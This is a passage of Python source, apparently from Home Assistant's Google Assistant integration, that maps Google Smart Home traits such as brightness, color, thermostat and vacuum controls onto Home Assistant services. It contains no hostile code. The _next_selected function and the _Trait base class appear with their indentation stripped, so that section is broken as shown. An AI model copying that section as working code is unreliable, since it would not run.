CHALLENGE_ACK_NEEDED,
CHALLENGE_FAILED_PIN_NEEDED,
CHALLENGE_PIN_NEEDED,
ERR_ALREADY_ARMED,
ERR_ALREADY_DISARMED,
ERR_ALREADY_STOPPED,
ERR_CHALLENGE_NOT_SETUP,
ERR_FUNCTION_NOT_SUPPORTED,
ERR_NO_AVAILABLE_CHANNEL,
ERR_NOT_SUPPORTED,
ERR_UNSUPPORTED_INPUT,
ERR_VALUE_OUT_OF_RANGE,
)
from .error import ChallengeNeeded, SmartHomeError
_LOGGER = logging.getLogger(__name__)

# Google Smart Home trait identifiers.
# See https://developers.google.com/assistant/smarthome/traits
PREFIX_TRAITS = "action.devices.traits."
TRAIT_CAMERA_STREAM = f"{PREFIX_TRAITS}CameraStream"
TRAIT_ONOFF = f"{PREFIX_TRAITS}OnOff"
TRAIT_DOCK = f"{PREFIX_TRAITS}Dock"
TRAIT_STARTSTOP = f"{PREFIX_TRAITS}StartStop"
TRAIT_BRIGHTNESS = f"{PREFIX_TRAITS}Brightness"
TRAIT_COLOR_SETTING = f"{PREFIX_TRAITS}ColorSetting"
TRAIT_SCENE = f"{PREFIX_TRAITS}Scene"
TRAIT_TEMPERATURE_SETTING = f"{PREFIX_TRAITS}TemperatureSetting"
TRAIT_TEMPERATURE_CONTROL = f"{PREFIX_TRAITS}TemperatureControl"
TRAIT_LOCKUNLOCK = f"{PREFIX_TRAITS}LockUnlock"
TRAIT_FANSPEED = f"{PREFIX_TRAITS}FanSpeed"
TRAIT_MODES = f"{PREFIX_TRAITS}Modes"
TRAIT_INPUTSELECTOR = f"{PREFIX_TRAITS}InputSelector"
TRAIT_OPENCLOSE = f"{PREFIX_TRAITS}OpenClose"
TRAIT_VOLUME = f"{PREFIX_TRAITS}Volume"
TRAIT_ARMDISARM = f"{PREFIX_TRAITS}ArmDisarm"
TRAIT_HUMIDITY_SETTING = f"{PREFIX_TRAITS}HumiditySetting"
TRAIT_TRANSPORT_CONTROL = f"{PREFIX_TRAITS}TransportControl"
TRAIT_MEDIA_STATE = f"{PREFIX_TRAITS}MediaState"
TRAIT_CHANNEL = f"{PREFIX_TRAITS}Channel"
TRAIT_LOCATOR = f"{PREFIX_TRAITS}Locator"
TRAIT_ENERGYSTORAGE = f"{PREFIX_TRAITS}EnergyStorage"
TRAIT_SENSOR_STATE = f"{PREFIX_TRAITS}SensorState"

# Google Smart Home command identifiers received in EXECUTE intents.
# NOTE: mixed casing after the prefix mirrors Google's API exactly.
PREFIX_COMMANDS = "action.devices.commands."
COMMAND_ONOFF = f"{PREFIX_COMMANDS}OnOff"
COMMAND_GET_CAMERA_STREAM = f"{PREFIX_COMMANDS}GetCameraStream"
COMMAND_DOCK = f"{PREFIX_COMMANDS}Dock"
COMMAND_STARTSTOP = f"{PREFIX_COMMANDS}StartStop"
COMMAND_PAUSEUNPAUSE = f"{PREFIX_COMMANDS}PauseUnpause"
COMMAND_BRIGHTNESS_ABSOLUTE = f"{PREFIX_COMMANDS}BrightnessAbsolute"
COMMAND_COLOR_ABSOLUTE = f"{PREFIX_COMMANDS}ColorAbsolute"
COMMAND_ACTIVATE_SCENE = f"{PREFIX_COMMANDS}ActivateScene"
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT = (
    f"{PREFIX_COMMANDS}ThermostatTemperatureSetpoint"
)
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE = (
    f"{PREFIX_COMMANDS}ThermostatTemperatureSetRange"
)
COMMAND_THERMOSTAT_SET_MODE = f"{PREFIX_COMMANDS}ThermostatSetMode"
COMMAND_LOCKUNLOCK = f"{PREFIX_COMMANDS}LockUnlock"
COMMAND_FANSPEED = f"{PREFIX_COMMANDS}SetFanSpeed"
COMMAND_FANSPEEDRELATIVE = f"{PREFIX_COMMANDS}SetFanSpeedRelative"
COMMAND_MODES = f"{PREFIX_COMMANDS}SetModes"
COMMAND_INPUT = f"{PREFIX_COMMANDS}SetInput"
COMMAND_NEXT_INPUT = f"{PREFIX_COMMANDS}NextInput"
COMMAND_PREVIOUS_INPUT = f"{PREFIX_COMMANDS}PreviousInput"
COMMAND_OPENCLOSE = f"{PREFIX_COMMANDS}OpenClose"
COMMAND_OPENCLOSE_RELATIVE = f"{PREFIX_COMMANDS}OpenCloseRelative"
COMMAND_SET_VOLUME = f"{PREFIX_COMMANDS}setVolume"
COMMAND_VOLUME_RELATIVE = f"{PREFIX_COMMANDS}volumeRelative"
COMMAND_MUTE = f"{PREFIX_COMMANDS}mute"
COMMAND_ARMDISARM = f"{PREFIX_COMMANDS}ArmDisarm"
COMMAND_MEDIA_NEXT = f"{PREFIX_COMMANDS}mediaNext"
COMMAND_MEDIA_PAUSE = f"{PREFIX_COMMANDS}mediaPause"
COMMAND_MEDIA_PREVIOUS = f"{PREFIX_COMMANDS}mediaPrevious"
COMMAND_MEDIA_RESUME = f"{PREFIX_COMMANDS}mediaResume"
COMMAND_MEDIA_SEEK_RELATIVE = f"{PREFIX_COMMANDS}mediaSeekRelative"
COMMAND_MEDIA_SEEK_TO_POSITION = f"{PREFIX_COMMANDS}mediaSeekToPosition"
COMMAND_MEDIA_SHUFFLE = f"{PREFIX_COMMANDS}mediaShuffle"
COMMAND_MEDIA_STOP = f"{PREFIX_COMMANDS}mediaStop"
COMMAND_REVERSE = f"{PREFIX_COMMANDS}Reverse"
COMMAND_SET_HUMIDITY = f"{PREFIX_COMMANDS}SetHumidity"
COMMAND_SELECT_CHANNEL = f"{PREFIX_COMMANDS}selectChannel"
COMMAND_LOCATE = f"{PREFIX_COMMANDS}Locate"
COMMAND_CHARGE = f"{PREFIX_COMMANDS}Charge"
# Registry of every trait class, filled in by the @register_trait decorator.
TRAITS = []


def register_trait(trait):
    """Class decorator: record *trait* in the global registry and return it unchanged."""
    TRAITS.append(trait)
    return trait
def _google_temp_unit(units):
    """Map a Home Assistant temperature unit to Google's single-letter code."""
    # Everything that is not Fahrenheit is reported as Celsius.
    return "F" if units == TEMP_FAHRENHEIT else "C"
def _next_selected(items: list[str], selected: str | None) -> str | None:
"""Return the next item in a item list starting at given value.
If selected is missing in items, None is returned
"""
try:
index = items.index(selected)
except ValueError:
return None
next_item = 0 if index == len(items) - 1 else index + 1
return items[next_item]
class _Trait:
"""Represents a Trait inside Google Assistant skill."""
commands = []
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return False
def __init__(self, hass, state, config):
"""Initialize a trait for a state."""
self.hass = hass
self.state = state
self.config = config
def sync_attributes(self):
"""Return attributes for a sync request."""
raise NotImplementedError
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
raise NotImplementedError
def can_execute(self, command, params):
"""Test if command can be executed."""
return command in self.commands
async def execute(self, command, data, params, challenge):
"""Execute a trait command."""
raise NotImplementedError
@register_trait
class BrightnessTrait(_Trait):
    """Trait to control brightness of a device.

    https://developers.google.com/actions/smarthome/traits/brightness
    """

    name = TRAIT_BRIGHTNESS
    commands = [COMMAND_BRIGHTNESS_ABSOLUTE]

    @staticmethod
    def supported(domain, features, device_class, attributes):
        """Test if state is supported."""
        if domain != light.DOMAIN:
            return False
        modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
        return light.brightness_supported(modes)

    def sync_attributes(self):
        """Return brightness attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return brightness query attributes."""
        response = {}
        if self.state.domain == light.DOMAIN:
            level = self.state.attributes.get(light.ATTR_BRIGHTNESS)
            # Convert HA's 0-255 brightness scale to Google's 0-100 percentage.
            response["brightness"] = int(100 * (level / 255)) if level is not None else 0
        return response

    async def execute(self, command, data, params, challenge):
        """Execute a brightness command."""
        if self.state.domain == light.DOMAIN:
            await self.hass.services.async_call(
                light.DOMAIN,
                light.SERVICE_TURN_ON,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    light.ATTR_BRIGHTNESS_PCT: params["brightness"],
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class CameraStreamTrait(_Trait):
    """Trait to stream from cameras.

    https://developers.google.com/actions/smarthome/traits/camerastream
    """

    name = TRAIT_CAMERA_STREAM
    commands = [COMMAND_GET_CAMERA_STREAM]

    # Set by execute(); holds the most recently requested stream payload.
    stream_info = None

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain != camera.DOMAIN:
            return False
        return features & camera.SUPPORT_STREAM

    def sync_attributes(self):
        """Return stream attributes for a sync request."""
        return {
            "cameraStreamSupportedProtocols": ["hls"],
            "cameraStreamNeedAuthToken": False,
            "cameraStreamNeedDrmEncryption": False,
        }

    def query_attributes(self):
        """Return camera stream attributes."""
        # Empty until a stream has been requested via execute().
        return self.stream_info or {}

    async def execute(self, command, data, params, challenge):
        """Execute a get camera stream command."""
        url = await self.hass.components.camera.async_request_stream(
            self.state.entity_id, "hls"
        )
        self.stream_info = {
            "cameraStreamAccessUrl": f"{get_url(self.hass)}{url}",
            "cameraStreamReceiverAppId": CAST_APP_ID_HOMEASSISTANT,
        }
@register_trait
class OnOffTrait(_Trait):
    """Trait to offer basic on and off functionality.

    https://developers.google.com/actions/smarthome/traits/onoff
    """

    name = TRAIT_ONOFF
    commands = [COMMAND_ONOFF]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain in (
            group.DOMAIN,
            input_boolean.DOMAIN,
            switch.DOMAIN,
            fan.DOMAIN,
            light.DOMAIN,
            media_player.DOMAIN,
            humidifier.DOMAIN,
        )

    def sync_attributes(self):
        """Return OnOff attributes for a sync request."""
        # Assumed-state entities accept commands but cannot report state.
        if self.state.attributes.get(ATTR_ASSUMED_STATE, False):
            return {"commandOnlyOnOff": True}
        return {}

    def query_attributes(self):
        """Return OnOff query attributes."""
        return {"on": self.state.state not in (STATE_OFF, STATE_UNKNOWN)}

    async def execute(self, command, data, params, challenge):
        """Execute an OnOff command."""
        domain = self.state.domain
        # Groups are toggled through the core homeassistant domain services.
        service_domain = HA_DOMAIN if domain == group.DOMAIN else domain
        service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
        await self.hass.services.async_call(
            service_domain,
            service,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class ColorSettingTrait(_Trait):
    """Trait to offer color temperature functionality.

    https://developers.google.com/actions/smarthome/traits/colortemperature
    """

    name = TRAIT_COLOR_SETTING
    commands = [COMMAND_COLOR_ABSOLUTE]

    @staticmethod
    def supported(domain, features, device_class, attributes):
        """Test if state is supported."""
        if domain != light.DOMAIN:
            return False
        color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
        return light.color_temp_supported(color_modes) or light.color_supported(
            color_modes
        )

    def sync_attributes(self):
        """Return color temperature attributes for a sync request."""
        attrs = self.state.attributes
        color_modes = attrs.get(light.ATTR_SUPPORTED_COLOR_MODES)
        response = {}
        if light.color_supported(color_modes):
            response["colorModel"] = "hsv"
        if light.color_temp_supported(color_modes):
            # Max Kelvin is Min Mireds K = 1000000 / mireds
            # Min Kelvin is Max Mireds K = 1000000 / mireds
            response["colorTemperatureRange"] = {
                "temperatureMaxK": color_util.color_temperature_mired_to_kelvin(
                    attrs.get(light.ATTR_MIN_MIREDS)
                ),
                "temperatureMinK": color_util.color_temperature_mired_to_kelvin(
                    attrs.get(light.ATTR_MAX_MIREDS)
                ),
            }
        return response

    def query_attributes(self):
        """Return color temperature query attributes."""
        color_mode = self.state.attributes.get(light.ATTR_COLOR_MODE)
        color = {}
        if light.color_supported([color_mode]):
            color_hs = self.state.attributes.get(light.ATTR_HS_COLOR)
            brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS, 1)
            if color_hs is not None:
                # Google expects saturation/value in 0-1, HA uses 0-100 / 0-255.
                color["spectrumHsv"] = {
                    "hue": color_hs[0],
                    "saturation": color_hs[1] / 100,
                    "value": brightness / 255,
                }
        if light.color_temp_supported([color_mode]):
            temp = self.state.attributes.get(light.ATTR_COLOR_TEMP)
            # Some faulty integrations might put 0 in here, raising exception.
            if temp == 0:
                _LOGGER.warning(
                    "Entity %s has incorrect color temperature %s",
                    self.state.entity_id,
                    temp,
                )
            elif temp is not None:
                color["temperatureK"] = color_util.color_temperature_mired_to_kelvin(
                    temp
                )
        response = {}
        if color:
            response["color"] = color
        return response

    async def execute(self, command, data, params, challenge):
        """Execute a color temperature command."""
        if "temperature" in params["color"]:
            temp = color_util.color_temperature_kelvin_to_mired(
                params["color"]["temperature"]
            )
            min_temp = self.state.attributes[light.ATTR_MIN_MIREDS]
            max_temp = self.state.attributes[light.ATTR_MAX_MIREDS]
            if temp < min_temp or temp > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    f"Temperature should be between {min_temp} and {max_temp}",
                )
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_COLOR_TEMP: temp},
                blocking=True,
                context=data.context,
            )
        elif "spectrumRGB" in params["color"]:
            # Convert integer to hex format and left pad with 0's till length 6.
            # BUGFIX: use single quotes for the nested subscripts — reusing
            # double quotes inside a double-quoted f-string is a SyntaxError
            # on Python < 3.12.
            hex_value = f"{params['color']['spectrumRGB']:06x}"
            color = color_util.color_RGB_to_hs(
                *color_util.rgb_hex_to_rgb_list(hex_value)
            )
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_HS_COLOR: color},
                blocking=True,
                context=data.context,
            )
        elif "spectrumHSV" in params["color"]:
            color = params["color"]["spectrumHSV"]
            # Google sends saturation/value in 0-1; HA expects 0-100 / 0-255.
            saturation = color["saturation"] * 100
            brightness = color["value"] * 255
            await self.hass.services.async_call(
                light.DOMAIN,
                SERVICE_TURN_ON,
                {
                    ATTR_ENTITY_ID: self.state.entity_id,
                    light.ATTR_HS_COLOR: [color["hue"], saturation],
                    light.ATTR_BRIGHTNESS: brightness,
                },
                blocking=True,
                context=data.context,
            )
@register_trait
class SceneTrait(_Trait):
    """Trait to offer scene functionality.

    https://developers.google.com/actions/smarthome/traits/scene
    """

    name = TRAIT_SCENE
    commands = [COMMAND_ACTIVATE_SCENE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain in (scene.DOMAIN, script.DOMAIN)

    def sync_attributes(self):
        """Return scene attributes for a sync request."""
        # Neither supported domain can support sceneReversible
        return {}

    def query_attributes(self):
        """Return scene query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a scene command."""
        # Scripts can run for a long time, so only block for scene activation.
        should_block = self.state.domain != script.DOMAIN
        await self.hass.services.async_call(
            self.state.domain,
            SERVICE_TURN_ON,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=should_block,
            context=data.context,
        )
@register_trait
class DockTrait(_Trait):
    """Trait to offer dock functionality.

    https://developers.google.com/actions/smarthome/traits/dock
    """

    name = TRAIT_DOCK
    commands = [COMMAND_DOCK]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN

    def sync_attributes(self):
        """Return dock attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return dock query attributes."""
        docked = self.state.state == vacuum.STATE_DOCKED
        return {"isDocked": docked}

    async def execute(self, command, data, params, challenge):
        """Execute a dock command by sending the vacuum back to its base."""
        await self.hass.services.async_call(
            self.state.domain,
            vacuum.SERVICE_RETURN_TO_BASE,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class LocatorTrait(_Trait):
    """Trait to offer locate functionality.

    https://developers.google.com/actions/smarthome/traits/locator
    """

    name = TRAIT_LOCATOR
    commands = [COMMAND_LOCATE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_LOCATE

    def sync_attributes(self):
        """Return locator attributes for a sync request."""
        return {}

    def query_attributes(self):
        """Return locator query attributes."""
        return {}

    async def execute(self, command, data, params, challenge):
        """Execute a locate command."""
        # Google may ask to silence an ongoing locate; HA has no such service.
        if params.get("silence", False):
            raise SmartHomeError(
                ERR_FUNCTION_NOT_SUPPORTED,
                "Silencing a Locate request is not yet supported",
            )
        await self.hass.services.async_call(
            self.state.domain,
            vacuum.SERVICE_LOCATE,
            {ATTR_ENTITY_ID: self.state.entity_id},
            blocking=True,
            context=data.context,
        )
@register_trait
class EnergyStorageTrait(_Trait):
    """Trait to offer EnergyStorage functionality.

    https://developers.google.com/actions/smarthome/traits/energystorage
    """

    name = TRAIT_ENERGYSTORAGE
    commands = [COMMAND_CHARGE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_BATTERY

    def sync_attributes(self):
        """Return EnergyStorage attributes for a sync request."""
        return {
            "isRechargeable": True,
            "queryOnlyEnergyStorage": True,
        }

    def query_attributes(self):
        """Return EnergyStorage query attributes."""
        battery_level = self.state.attributes.get(ATTR_BATTERY_LEVEL)
        if battery_level is None:
            # No battery reading available; previously this fell through to
            # `75 <= None < 100` and raised TypeError.
            return {}
        if battery_level == 100:
            descriptive_capacity_remaining = "FULL"
        elif 75 <= battery_level < 100:
            descriptive_capacity_remaining = "HIGH"
        elif 50 <= battery_level < 75:
            descriptive_capacity_remaining = "MEDIUM"
        elif 25 <= battery_level < 50:
            descriptive_capacity_remaining = "LOW"
        else:
            # 0-24%, plus a defensive bucket for out-of-range readings that
            # previously left this variable unbound (UnboundLocalError).
            descriptive_capacity_remaining = "CRITICALLY_LOW"
        return {
            "descriptiveCapacityRemaining": descriptive_capacity_remaining,
            "capacityRemaining": [{"rawValue": battery_level, "unit": "PERCENTAGE"}],
            "capacityUntilFull": [
                {"rawValue": 100 - battery_level, "unit": "PERCENTAGE"}
            ],
            # Being on the dock is the only charging signal vacuums expose.
            "isCharging": self.state.state == vacuum.STATE_DOCKED,
            "isPluggedIn": self.state.state == vacuum.STATE_DOCKED,
        }

    async def execute(self, command, data, params, challenge):
        """Execute a dock command."""
        raise SmartHomeError(
            ERR_FUNCTION_NOT_SUPPORTED,
            "Controlling charging of a vacuum is not yet supported",
        )
@register_trait
class StartStopTrait(_Trait):
    """Trait to offer StartStop functionality.

    Supports vacuums (start/stop/pause) and covers (stop only).
    https://developers.google.com/actions/smarthome/traits/startstop
    """

    name = TRAIT_STARTSTOP
    commands = [COMMAND_STARTSTOP, COMMAND_PAUSEUNPAUSE]

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain == vacuum.DOMAIN:
            return True
        # Covers qualify only when they can be stopped mid-travel.
        if domain == cover.DOMAIN and features & cover.SUPPORT_STOP:
            return True
        return False

    def sync_attributes(self):
        """Return StartStop attributes for a sync request."""
        domain = self.state.domain
        if domain == vacuum.DOMAIN:
            return {
                # Pausable only when the vacuum advertises SUPPORT_PAUSE.
                "pausable": self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
                & vacuum.SUPPORT_PAUSE
                != 0
            }
        if domain == cover.DOMAIN:
            return {}

    def query_attributes(self):
        """Return StartStop query attributes."""
        domain = self.state.domain
        state = self.state.state
        if domain == vacuum.DOMAIN:
            return {
                "isRunning": state == vacuum.STATE_CLEANING,
                "isPaused": state == vacuum.STATE_PAUSED,
            }
        if domain == cover.DOMAIN:
            # A cover "runs" while it is actively opening or closing.
            return {"isRunning": state in (cover.STATE_CLOSING, cover.STATE_OPENING)}

    async def execute(self, command, data, params, challenge):
        """Execute a StartStop command by dispatching on the entity domain."""
        domain = self.state.domain
        if domain == vacuum.DOMAIN:
            return await self._execute_vacuum(command, data, params, challenge)
        if domain == cover.DOMAIN:
            return await self._execute_cover(command, data, params, challenge)

    async def _execute_vacuum(self, command, data, params, challenge):
        """Execute a StartStop command for a vacuum entity."""
        if command == COMMAND_STARTSTOP:
            if params["start"]:
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_START,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
            else:
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_STOP,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
        elif command == COMMAND_PAUSEUNPAUSE:
            if params["pause"]:
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_PAUSE,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )
            else:
                # Unpause maps to the regular start service.
                await self.hass.services.async_call(
                    self.state.domain,
                    vacuum.SERVICE_START,
                    {ATTR_ENTITY_ID: self.state.entity_id},
                    blocking=True,
                    context=data.context,
                )

    async def _execute_cover(self, command, data, params, challenge):
        """Execute a StartStop command for a cover entity (stop only)."""
        if command == COMMAND_STARTSTOP:
            if params["start"] is False:
                # Only stop a cover that is moving, or whose real state we
                # cannot know (assumed state).
                if (
                    self.state.state
                    in (
                        cover.STATE_CLOSING,
                        cover.STATE_OPENING,
                    )
                    or self.state.attributes.get(ATTR_ASSUMED_STATE)
                ):
                    await self.hass.services.async_call(
                        self.state.domain,
                        cover.SERVICE_STOP_COVER,
                        {ATTR_ENTITY_ID: self.state.entity_id},
                        blocking=True,
                        context=data.context,
                    )
                else:
                    raise SmartHomeError(
                        ERR_ALREADY_STOPPED, "Cover is already stopped"
                    )
            else:
                raise SmartHomeError(
                    ERR_NOT_SUPPORTED, "Starting a cover is not supported"
                )
        else:
            raise SmartHomeError(
                ERR_NOT_SUPPORTED, f"Command {command} is not supported"
            )
@register_trait
class TemperatureControlTrait(_Trait):
    """Trait for devices (other than thermostats) that support controlling temperature. Workaround for Temperature sensors.

    https://developers.google.com/assistant/smarthome/traits/temperaturecontrol
    """

    name = TRAIT_TEMPERATURE_CONTROL

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        if domain != sensor.DOMAIN:
            return False
        return device_class == sensor.DEVICE_CLASS_TEMPERATURE

    def sync_attributes(self):
        """Return temperature attributes for a sync request."""
        return {
            "temperatureUnitForUX": _google_temp_unit(
                self.hass.config.units.temperature_unit
            ),
            "queryOnlyTemperatureSetting": True,
            "temperatureRange": {
                "minThresholdCelsius": -100,
                "maxThresholdCelsius": 100,
            },
        }

    def query_attributes(self):
        """Return temperature states."""
        current = self.state.state
        if current in (STATE_UNKNOWN, STATE_UNAVAILABLE):
            return {}
        unit = self.hass.config.units.temperature_unit
        celsius = round(temp_util.convert(float(current), unit, TEMP_CELSIUS), 1)
        # Google requires a setpoint even for read-only sensors, so mirror
        # the ambient reading into both fields.
        return {
            "temperatureSetpointCelsius": celsius,
            "temperatureAmbientCelsius": celsius,
        }

    async def execute(self, command, data, params, challenge):
        """Unsupported."""
        raise SmartHomeError(ERR_NOT_SUPPORTED, "Execute is not supported by sensor")
@register_trait
class TemperatureSettingTrait(_Trait):
    """Trait to offer handling both temperature point and modes functionality.

    https://developers.google.com/actions/smarthome/traits/temperaturesetting
    """

    name = TRAIT_TEMPERATURE_SETTING
    commands = [
        COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
        COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
        COMMAND_THERMOSTAT_SET_MODE,
    ]
    # We do not support "on" as we are unable to know how to restore
    # the last mode.
    # Mapping of HA HVAC modes to Google thermostat mode names.
    hvac_to_google = {
        climate.HVAC_MODE_HEAT: "heat",
        climate.HVAC_MODE_COOL: "cool",
        climate.HVAC_MODE_OFF: "off",
        climate.HVAC_MODE_AUTO: "auto",
        climate.HVAC_MODE_HEAT_COOL: "heatcool",
        climate.HVAC_MODE_FAN_ONLY: "fan-only",
        climate.HVAC_MODE_DRY: "dry",
    }
    google_to_hvac = {value: key for key, value in hvac_to_google.items()}

    # Preset modes that are exposed as Google thermostat modes.
    preset_to_google = {climate.PRESET_ECO: "eco"}
    google_to_preset = {value: key for key, value in preset_to_google.items()}

    @staticmethod
    def supported(domain, features, device_class, _):
        """Test if state is supported."""
        return domain == climate.DOMAIN

    @property
    def climate_google_modes(self):
        """Return supported Google modes."""
        modes = []
        attrs = self.state.attributes

        # Collect Google modes from both HVAC modes and preset modes,
        # de-duplicating as we go.
        for mode in attrs.get(climate.ATTR_HVAC_MODES, []):
            google_mode = self.hvac_to_google.get(mode)
            if google_mode and google_mode not in modes:
                modes.append(google_mode)

        for preset in attrs.get(climate.ATTR_PRESET_MODES, []):
            google_mode = self.preset_to_google.get(preset)
            if google_mode and google_mode not in modes:
                modes.append(google_mode)

        return modes

    def sync_attributes(self):
        """Return temperature point and modes attributes for a sync request."""
        response = {}
        response["thermostatTemperatureUnit"] = _google_temp_unit(
            self.hass.config.units.temperature_unit
        )

        modes = self.climate_google_modes

        # Some integrations don't support modes (e.g. opentherm), but Google doesn't
        # support changing the temperature if we don't have any modes. If there's
        # only one Google doesn't support changing it, so the default mode here is
        # only cosmetic.
        if len(modes) == 0:
            modes.append("heat")

        if "off" in modes and any(
            mode in modes for mode in ("heatcool", "heat", "cool")
        ):
            modes.append("on")
        response["availableThermostatModes"] = modes

        return response

    def query_attributes(self):
        """Return temperature point and modes query attributes."""
        response = {}
        attrs = self.state.attributes
        unit = self.hass.config.units.temperature_unit

        operation = self.state.state
        preset = attrs.get(climate.ATTR_PRESET_MODE)
        supported = attrs.get(ATTR_SUPPORTED_FEATURES, 0)

        # An active preset (e.g. eco) takes precedence over the HVAC mode.
        if preset in self.preset_to_google:
            response["thermostatMode"] = self.preset_to_google[preset]
        else:
            response["thermostatMode"] = self.hvac_to_google.get(operation, "none")

        current_temp = attrs.get(climate.ATTR_CURRENT_TEMPERATURE)
        if current_temp is not None:
            response["thermostatTemperatureAmbient"] = round(
                temp_util.convert(current_temp, unit, TEMP_CELSIUS), 1
            )

        current_humidity = attrs.get(climate.ATTR_CURRENT_HUMIDITY)
        if current_humidity is not None:
            response["thermostatHumidityAmbient"] = current_humidity

        if operation in (climate.HVAC_MODE_AUTO, climate.HVAC_MODE_HEAT_COOL):
            if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
                response["thermostatTemperatureSetpointHigh"] = round(
                    temp_util.convert(
                        attrs[climate.ATTR_TARGET_TEMP_HIGH], unit, TEMP_CELSIUS
                    ),
                    1,
                )
                response["thermostatTemperatureSetpointLow"] = round(
                    temp_util.convert(
                        attrs[climate.ATTR_TARGET_TEMP_LOW], unit, TEMP_CELSIUS
                    ),
                    1,
                )
            else:
                # No range support: report the single target as both bounds.
                if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
                    target_temp = round(
                        temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
                    )
                    response["thermostatTemperatureSetpointHigh"] = target_temp
                    response["thermostatTemperatureSetpointLow"] = target_temp
        else:
            if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
                response["thermostatTemperatureSetpoint"] = round(
                    temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
                )

        return response

    async def execute(self, command, data, params, challenge):
        """Execute a temperature point or mode command."""
        # All sent in temperatures are always in Celsius
        unit = self.hass.config.units.temperature_unit
        min_temp = self.state.attributes[climate.ATTR_MIN_TEMP]
        max_temp = self.state.attributes[climate.ATTR_MAX_TEMP]

        if command == COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT:
            temp = temp_util.convert(
                params["thermostatTemperatureSetpoint"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp = round(temp)

            if temp < min_temp or temp > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    f"Temperature should be between {min_temp} and {max_temp}",
                )

            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_TEMPERATURE,
                {ATTR_ENTITY_ID: self.state.entity_id, ATTR_TEMPERATURE: temp},
                blocking=True,
                context=data.context,
            )

        elif command == COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE:
            temp_high = temp_util.convert(
                params["thermostatTemperatureSetpointHigh"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp_high = round(temp_high)

            if temp_high < min_temp or temp_high > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    (
                        f"Upper bound for temperature range should be between "
                        f"{min_temp} and {max_temp}"
                    ),
                )

            temp_low = temp_util.convert(
                params["thermostatTemperatureSetpointLow"], TEMP_CELSIUS, unit
            )
            if unit == TEMP_FAHRENHEIT:
                temp_low = round(temp_low)

            if temp_low < min_temp or temp_low > max_temp:
                raise SmartHomeError(
                    ERR_VALUE_OUT_OF_RANGE,
                    (
                        f"Lower bound for temperature range should be between "
                        f"{min_temp} and {max_temp}"
                    ),
                )

            supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)
            svc_data = {ATTR_ENTITY_ID: self.state.entity_id}

            if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
                svc_data[climate.ATTR_TARGET_TEMP_HIGH] = temp_high
                svc_data[climate.ATTR_TARGET_TEMP_LOW] = temp_low
            else:
                # No range support: fall back to the midpoint of the range.
                svc_data[ATTR_TEMPERATURE] = (temp_high + temp_low) / 2

            await self.hass.services.async_call(
                climate.DOMAIN,
                climate.SERVICE_SET_TEMPERATURE,
                svc_data,
                blocking=True,
                context=data.context,
            )

        elif command == COMMAND_THERMOSTAT_SET_MODE:
            target_mode = params["thermostatMode"]
            supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)

            if target_mode == "on":
                await self.hass.services.async_call(
                    climate.DOMAIN,
                    SERVICE_TURN_ON,
                    {ATTR_ENTITY_ID: self.state.entity_id},
